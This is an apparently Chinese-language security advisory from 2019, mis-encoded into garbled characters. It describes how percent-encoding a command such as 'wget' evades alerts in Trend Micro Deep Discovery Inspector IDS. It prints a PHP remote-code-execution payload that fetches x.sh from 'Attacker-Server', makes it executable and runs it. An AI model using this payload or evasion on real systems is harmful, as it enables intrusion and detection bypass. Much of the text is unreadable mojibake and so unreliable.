Trend Micro Deep Discovery Inspector IDS°²È«Èƹý·ì϶°²È«¹«¸æ

°ä²¼¹¦·ò 2019-07-26

·ì϶±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬ £¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬ £¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


Trend Micro Deep Discovery Inspector IDS


·ì϶¸ÅÊö


Trend Micro Deep Discovery Inspector IDS ÊÇÒ»ÖÖÍøÂçÉ豸£¬£¬£¬£¬ £¬£¬¿É¼à¿ØËùÓÐÀàÐͺͳ¬¹ý105ÖÖ·ÖÆçµÄÍøÂçºÍ̸£¬£¬£¬£¬ £¬£¬ÒÔ·¢ÏÖ½ø³öÍøÂçµÄ¸ß¼¶ÍþвºÍÓÐÕë¶ÔÐԵĹ¥»÷¡£¡£¡£¡£¡£ ¡£¡£2019Äê7ÔÂ24ÈÕ£¬£¬£¬£¬ £¬£¬×êÑÐÈËÔ±Åû¶ÁËTrend Micro Deep Discovery Inspector IDS °²È«Èƹý·ì϶µÄÏêÇé¡£¡£¡£¡£¡£ ¡£¡£°²È«Èƹý·ì϶ԴÓÚÍøÂçϵͳ»ò²úÆ·ÖжÌȱÄÚÈÝÑéÖ¤¹æ¶¨»ò¶ÔÄÚÈÝÑé֤ǿ¶È²»¼°¡£¡£¡£¡£¡£ ¡£¡£


·ì϶ÑéÖ¤


¾­¹ý¶ÈÎö£¬£¬£¬£¬ £¬£¬IDS·¢ÏÖ¶ñÒâϵͳºÅÁÈç¡°Wget  Commandline  Injection¡±£©»á·¢³ö¾¯±¨£¬£¬£¬£¬ £¬£¬²¢ÇÒ½«ËüÃÇÏóÕ÷Ϊ¸ß·çÏÕ¡£¡£¡£¡£¡£ ¡£¡£¹¥»÷Õß½«payloadÓëͨ³£µÄascii×Ö·ûһ··¢ËÍ£¬£¬£¬£¬ £¬£¬ÀýÈç¡°wget¡±£¬£¬£¬£¬ £¬£¬¼´±ãËüÃǽøÐÐÁËÈç¡°\ x77 \ x67 \ x65 \ x74¡±µÄ±àÂ룬£¬£¬£¬ £¬£¬ÈԻᷢ³ö¾¯±¨¡£¡£¡£¡£¡£ ¡£¡£µ«ÊÇ£¬£¬£¬£¬ £¬£¬¹¥»÷ÕßÄܹ»Í¨¹ýÔÚHEXÖÐÒÔ°Ù·ÖºÅ×Ö·û¡°£¥¡±¿ªÍ·µÄ¶ñÒâºÅÁîÀ´ÇáËÉÈƹýÕâЩ¾¯±¨£¬£¬£¬£¬ £¬£¬ÀýÈ磬£¬£¬£¬ £¬£¬¡°£¥77£¥ 67£¥65£¥74¡±Ò²×ª»»Îª¡°wget¡±£¬£¬£¬£¬ £¬£¬²»½ö²»»á±»ÏóÕ÷»òÖҸ棬£¬£¬£¬ £¬£¬Ò²Äܹ»ÔÚÖ¸±êϵͳÉÏÖ´ÐÓ×£¡£¡£¡£¡£ ¡£¡£


Payload£º


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


½¨¸´½¨Òé


¹Ø×¢¹Ù·½ÍøÕ¾£¬£¬£¬£¬ £¬£¬ÊµÊ±ÏÂÔز¹¶¡¸üС£¡£¡£¡£¡£ ¡£¡£


²Î¿¼Á´½Ó